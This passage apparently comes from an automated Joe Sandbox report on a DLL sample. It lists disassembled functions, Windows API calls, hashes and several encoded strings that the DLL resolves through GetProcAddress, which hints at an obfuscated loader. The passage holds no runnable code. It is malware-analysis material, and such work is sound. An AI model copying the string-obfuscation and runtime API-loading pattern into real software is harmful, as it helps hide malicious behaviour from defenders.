              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID: 0
              • API String ID: 0-4108050209
              • Opcode ID: 774b4a31dcc9c4379088ea65bffab2e8ba880496b2367c1d3941ce7173daa150
              • Instruction ID: f54276375cea88c81972c5849074aa4fbdbb9cf687abc8718ad1cf828b7fa8cd
              • Opcode Fuzzy Hash: 774b4a31dcc9c4379088ea65bffab2e8ba880496b2367c1d3941ce7173daa150
              • Instruction Fuzzy Hash: 7BC1E230A007469FCB27CF68C5807AABBB9EF06344F10461ED5669B6E9D332F949CB51
              Function 6F9F2E75 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: HeapProcess
              • String ID:
              • API String ID: 54951025-0
              • Opcode ID: d42ed90b3f0a4c7b80331462578af12523d19412393b94d7123c2264b1ce264a
              • Instruction ID: 879fc0ca6596c8f731399cef3e81d534b9cdfa68c673ea9e4815f3842875dc35
              • Opcode Fuzzy Hash: d42ed90b3f0a4c7b80331462578af12523d19412393b94d7123c2264b1ce264a
              • Instruction Fuzzy Hash: DDA012306016018B5B004E30630420C35E8760A1A534440185604C0004D72040214A00
              Function 6F9E93CB Relevance: .3, Instructions: 318COMMONLIBRARYCODE
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6b9de71bf78ba9155069d861d1f844954c84bd632519fd0e087cf5370068b3e6
              • Instruction ID: bf4771016720a95c73b2e361a8cf9011fa09eeba57248de0b108727e2f8e29c6
              • Opcode Fuzzy Hash: 6b9de71bf78ba9155069d861d1f844954c84bd632519fd0e087cf5370068b3e6
              • Instruction Fuzzy Hash: 96B1067090471A8BCB17CE78C5906AEB7B9AF85708F00061FD8669B6D9EB31F646CB41
              Function 6F9E1274 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 137libraryloaderCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetModuleHandleW.KERNEL32(kernel32.dll,000000C8,00000000,6FA00E3C), ref: 6F9E12AB
              • _strlen.LIBCMT ref: 6F9E12CA
              • GetProcAddress.KERNEL32(?), ref: 6F9E1318
              • _strlen.LIBCMT ref: 6F9E1336
              • GetProcAddress.KERNEL32(?), ref: 6F9E137E
              • _strlen.LIBCMT ref: 6F9E13A1
              • GetProcAddress.KERNEL32(?), ref: 6F9E13E7
              Strings
              • kernel32.dll, xrefs: 6F9E12A6
              • QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>, xrefs: 6F9E1320
              • QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>, xrefs: 6F9E12B1
              • QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>, xrefs: 6F9E138B
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: AddressProc_strlen$HandleModule
              • String ID: QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>$QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>$QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>$kernel32.dll
              • API String ID: 3538810943-2765630095
              • Opcode ID: a05f8d45d7267224055fceed0a656bf5fe71c851f62b4e2f17c4690b53eb4f9d
              • Instruction ID: d6edb42e3ec7574594b70c827e0a6a6c5876ce9c5f3f3e786e12283e5015a1b7
              • Opcode Fuzzy Hash: a05f8d45d7267224055fceed0a656bf5fe71c851f62b4e2f17c4690b53eb4f9d
              • Instruction Fuzzy Hash: 3F41A171D007489BDB26DFF4EC909AE7BB8BF69208F54842ED951D3282EB359905CB10
              Function 6F9F65F9 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
              Download Yara Rule
              APIs
                • Part of subcall function 6F9F6340: CreateFileW.KERNEL32(00000000,00000000,?,6F9F66A2,?,?,00000000,?,6F9F66A2,00000000,0000000C), ref: 6F9F635D
              • GetLastError.KERNEL32 ref: 6F9F670D
              • __dosmaperr.LIBCMT ref: 6F9F6714
              • GetFileType.KERNEL32(00000000), ref: 6F9F6720
              • GetLastError.KERNEL32 ref: 6F9F672A
              • __dosmaperr.LIBCMT ref: 6F9F6733
              • CloseHandle.KERNEL32(00000000), ref: 6F9F6753
              • CloseHandle.KERNEL32(00000000), ref: 6F9F68A0
              • GetLastError.KERNEL32 ref: 6F9F68D2
              • __dosmaperr.LIBCMT ref: 6F9F68D9
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
              • String ID: H
              • API String ID: 4237864984-2852464175
              • Opcode ID: 33078b5a48b1cb3652776a81294ff222925e90476b64218e58754a2518311b84
              • Instruction ID: 828bf70aabec8da5f72e49fbffe0f4d003aabd93dbe7dc05b85f7a33ae7ee12c
              • Opcode Fuzzy Hash: 33078b5a48b1cb3652776a81294ff222925e90476b64218e58754a2518311b84
              • Instruction Fuzzy Hash: 2CA10E32A157059BCF099F68D851BAD3BB5AF07328F28025DE8119F2D2CB35D823CB91
              Function 6F9F69E0 Relevance: 13.9, APIs: 9, Instructions: 354COMMON
              Download Yara Rule
              APIs
              • mydllmain.DLL1(00000000,?), ref: 6F9F6A97
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: mydllmain
              • String ID:
              • API String ID: 979097349-0
              • Opcode ID: 42af1bba095e08f3a14e334087738255b175f57d1233d889ccf1f4d9190aca35
              • Instruction ID: afd562df5538cbba07914ef7081aaad4251653abe29e440ad01e48ce1ccfee6b
              • Opcode Fuzzy Hash: 42af1bba095e08f3a14e334087738255b175f57d1233d889ccf1f4d9190aca35
              • Instruction Fuzzy Hash: 9DE14C31E0522A8BCB75CF288D947DDB7B5AF9A300F1581E9C999A7340D671AEC1CF90
              Function 6F9E4E2A Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • type_info::operator==.LIBVCRUNTIME ref: 6F9E4F49
              • ___TypeMatch.LIBVCRUNTIME ref: 6F9E5057
              • _UnwindNestedFrames.LIBCMT ref: 6F9E51A9
              • CallUnexpected.LIBVCRUNTIME ref: 6F9E51C4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
              • String ID: csm$csm$csm
              • API String ID: 2751267872-393685449
              • Opcode ID: 4fabeb4c11d48cb0691c48f521481161fa39932734a92640b097eb783114b5c2
              • Instruction ID: dcb7577ef46a413af80cc7edb809be7dd44db4107f8aecf8dffd11f69d67dc73
              • Opcode Fuzzy Hash: 4fabeb4c11d48cb0691c48f521481161fa39932734a92640b097eb783114b5c2
              • Instruction Fuzzy Hash: 18B18879800309EFCF16DFA8D88099EBBB9BF14314F10456AE815AB2D6D731EA51CF91
              Function 6F9E4890 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120COMMON
              Download Yara Rule
              APIs
              • _ValidateLocalCookies.LIBCMT ref: 6F9E48C7
              • ___except_validate_context_record.LIBVCRUNTIME ref: 6F9E48CF
              • _ValidateLocalCookies.LIBCMT ref: 6F9E4958
              • __IsNonwritableInCurrentImage.LIBCMT ref: 6F9E4983
              • mydllmain.DLL1(?,00000001), ref: 6F9E499C
              • _ValidateLocalCookies.LIBCMT ref: 6F9E49D8
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_recordmydllmain
              • String ID: csm
              • API String ID: 2845398917-1018135373
              • Opcode ID: 1e01a54927e55d3f9290ce93a6d010125ad1af031cc4b6a2123dd151d90c4721
              • Instruction ID: 21fb42a514ff7f82a3bed27f9cef5fe730e8158c28642f6dcdd3b1be25258db8
              • Opcode Fuzzy Hash: 1e01a54927e55d3f9290ce93a6d010125ad1af031cc4b6a2123dd151d90c4721
              • Instruction Fuzzy Hash: F141A438A00209AFCF01CF6CD880A9EBBB5BF45728F108155D924AB3D2D735EA16CF91
              Function 6F9EEA0D Relevance: 10.8, APIs: 7, Instructions: 329COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: _strrchr
              • String ID:
              • API String ID: 3213747228-0
              • Opcode ID: aea14ec4fce50e11b916ea9db58d0fd03005b2f780920c9197a192cf75d5e781
              • Instruction ID: bdf005cc19e2d7ec3f58392d5ed710c38c52e297eee3e145a5f394f74fd62591
              • Opcode Fuzzy Hash: aea14ec4fce50e11b916ea9db58d0fd03005b2f780920c9197a192cf75d5e781
              • Instruction Fuzzy Hash: C6B15872A403559FEB13DF68CC81BAE7BA9EF5A314F164156E804AF2C2D374E801C7A0
              Function 6F9EFA83 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • FreeLibrary.KERNEL32(00000000,?,6F9EFB92,6F9E60D4,B586E81C,00000000,6F9EAAAA,00000000,?,6F9EFD0B,00000022,FlsSetValue,6F9FD4F0,ccs,6F9EAAAA), ref: 6F9EFB44
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: FreeLibrary
              • String ID: api-ms-$ext-ms-
              • API String ID: 3664257935-537541572
              • Opcode ID: d33869abf37a2e39349a80122c16a8d929b4ff648a9d224b67a12360d05aa2a0
              • Instruction ID: 8133653013bf0186c70dd80af1c3884fa01e03f410e98773ab18913ab33be5a3
              • Opcode Fuzzy Hash: d33869abf37a2e39349a80122c16a8d929b4ff648a9d224b67a12360d05aa2a0
              • Instruction Fuzzy Hash: 4F21D572A06611E7DB239E65FC50A4A377CEF8277CB194116ED19AB2C4E730F901C6D0
              Function 6F9EC7A6 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,456EBF13,6F9EAAAA,?,00000000,6F9FAA10,000000FF,?,6F9EC740,B586E81C,?,6F9EC714,?), ref: 6F9EC7DB
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6F9EC7ED
              • mydllmain.DLL1(B586E81C,?,00000000,6F9FAA10,000000FF,?,6F9EC740,B586E81C,?,6F9EC714,?), ref: 6F9EC7FE
              • FreeLibrary.KERNEL32(00000000,?,00000000,6F9FAA10,000000FF,?,6F9EC740,B586E81C,?,6F9EC714,?), ref: 6F9EC80F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProcmydllmain
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 361333426-1276376045
              • Opcode ID: eab947acee68a7a8a253edc9dd6ad3e8e088a2edcaaa0ab7ef83d3f8f5d4227b
              • Instruction ID: ed39819689001fbccc8f9033173810a13d08aa10c6040bf05aacbddeec0a1a8f
              • Opcode Fuzzy Hash: eab947acee68a7a8a253edc9dd6ad3e8e088a2edcaaa0ab7ef83d3f8f5d4227b
              • Instruction Fuzzy Hash: 61018F31905A1AEBEB128F50CC09BAEBBB8FB44764F004526E822A26C0DB34D901CE90
              Function 6F9EE197 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b108430ace2ae2e195cb0785f84125f37a562e01eb83432d2d944133b503c69e
              • Instruction ID: 7647802357515487b534f0337983a4b01f546191ea04af5b775c0ba7a625cba5
              • Opcode Fuzzy Hash: b108430ace2ae2e195cb0785f84125f37a562e01eb83432d2d944133b503c69e
              • Instruction Fuzzy Hash: 84B10570A0434AAFDB03EFA8D880BAD7BB5BF5A314F024159E5149B3C2D771E956CB60
              Function 6F9E4AF3 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetLastError.KERNEL32(00000001,?,6F9E4A71,6F9E3517,6F9E2EE4,?,6F9E311C,?,00000001,?,?,00000001,?,6FA01FC8,0000000C,6F9E3215), ref: 6F9E4B01
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6F9E4B0F
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6F9E4B28
              • SetLastError.KERNEL32(00000000,6F9E311C,?,00000001,?,?,00000001,?,6FA01FC8,0000000C,6F9E3215,?,00000001,?), ref: 6F9E4B7A
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              • Opcode ID: cc22e5fb2661b7a96bb395338c357357c37926b6c562c8c4442c5527a6c381b8
              • Instruction ID: 4e7cf688260096915d7ed344b17a23e7a0b72cfbf78f7a60fa6dcf1adb68d6ca
              • Opcode Fuzzy Hash: cc22e5fb2661b7a96bb395338c357357c37926b6c562c8c4442c5527a6c381b8
              • Instruction Fuzzy Hash: D401F13A20EB122EE6160DBC6C85B5F37A9FF02778324032EE520852D5EF51D8268954
              Function 6F9F2178 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
              Download Yara Rule
              Strings
              • C:\Windows\system32\loaddll32.exe, xrefs: 6F9F2194
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID: C:\Windows\system32\loaddll32.exe
              • API String ID: 0-1062229814
              • Opcode ID: 28051e527f8b3cbb9e0592dbd45ff72b5e09849b74fff946af79bc4e041ed96f
              • Instruction ID: 2068e1e1066332e983ce4f34bd2a8899538b73368c6988d1c8951a265d3822cf
              • Opcode Fuzzy Hash: 28051e527f8b3cbb9e0592dbd45ff72b5e09849b74fff946af79bc4e041ed96f
              • Instruction Fuzzy Hash: 5C219031606285AFDB259F75CC80A9A77BDFF153787104528E928DB2C1E731EC1287A0
              Function 6F9F7074 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
              Download Yara Rule
              APIs
              • __alloca_probe_16.LIBCMT ref: 6F9F70F9
              • __alloca_probe_16.LIBCMT ref: 6F9F71C2
              • __freea.LIBCMT ref: 6F9F7229
                • Part of subcall function 6F9EE7FE: HeapAlloc.KERNEL32(00000000,6F9F26F1,?,?,6F9F26F1,00000220,?,?,?), ref: 6F9EE830
              • __freea.LIBCMT ref: 6F9F723C
              • __freea.LIBCMT ref: 6F9F7249
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: __freea$__alloca_probe_16$AllocHeap
              • String ID:
              • API String ID: 1096550386-0
              • Opcode ID: e2e89a9ea8593e6b0cfd399966976ac5d5411cee2b145226237d4c9289e38e0a
              • Instruction ID: 3a035033afc96f1722e83c0be7949e2cad1da0b987f837512ae3d8f52a39572c
              • Opcode Fuzzy Hash: e2e89a9ea8593e6b0cfd399966976ac5d5411cee2b145226237d4c9289e38e0a
              • Instruction Fuzzy Hash: 5751E7726023066FEB118FA4DC81EEB3AAEEF55714F15012AFD14D61D1EB30EC5287A2
              Function 6F9E4BD3 Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • mydllmain.DLL1(6FA020D0,00000010,6F9E4D45,?,?,?,?,6FA020F0,00000008,6F9E4DC9,?,?,?,00000000), ref: 6F9E4C32
              • ___AdjustPointer.LIBCMT ref: 6F9E4C9A
              • ___AdjustPointer.LIBCMT ref: 6F9E4CBD
              • ___AdjustPointer.LIBCMT ref: 6F9E4D59
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: AdjustPointer$mydllmain
              • String ID:
              • API String ID: 3586548312-0
              • Opcode ID: a97aed2e2f24b6bc476e67e0494d091584efe8357c4061f7de10aaaa154fc8f0
              • Instruction ID: c14818a5ec750cd00fa8f87ca4a09ccd776b0f63d96feb830be4f3c58c92b239
              • Opcode Fuzzy Hash: a97aed2e2f24b6bc476e67e0494d091584efe8357c4061f7de10aaaa154fc8f0
              • Instruction Fuzzy Hash: 1951DD7A644706AFEB2A8F68D840BEA77B9FF44314F10452AD8158B2D1D731F880CF90
              Function 6F9E60DA Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 181COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F9E6177
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F9E627E
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F9E6291
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
              • String ID: 5q
              • API String ID: 885266447-1627527040
              • Opcode ID: 4fd9d191c58d79bcdf1769613de63e25729df438f3d71490d2be7c779e85855a
              • Instruction ID: d2e6a76b97a456878d7e59d4998a50ddac5099b96952788c9c33bea20682c7c5
              • Opcode Fuzzy Hash: 4fd9d191c58d79bcdf1769613de63e25729df438f3d71490d2be7c779e85855a
              • Instruction Fuzzy Hash: D1519471A10209AFCF16CF98C940EDEBBB6EF8A314F148159E954AB395D330EE12CB50
              Function 6F9E5C02 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6F9E5BB3,00000000,?,00000001,?,?,?,6F9E5CA2,00000001,FlsFree,6F9FBCD8,FlsFree), ref: 6F9E5C0F
              • GetLastError.KERNEL32(?,6F9E5BB3,00000000,?,00000001,?,?,?,6F9E5CA2,00000001,FlsFree,6F9FBCD8,FlsFree,00000000,?,6F9E4BC8), ref: 6F9E5C19
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6F9E5C41
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: LibraryLoad$ErrorLast
              • String ID: api-ms-
              • API String ID: 3177248105-2084034818
              • Opcode ID: f3a7936ef8d702ea13330c677b76a87a2ea3cd541a6e0d0fa7ace175b40a3a47
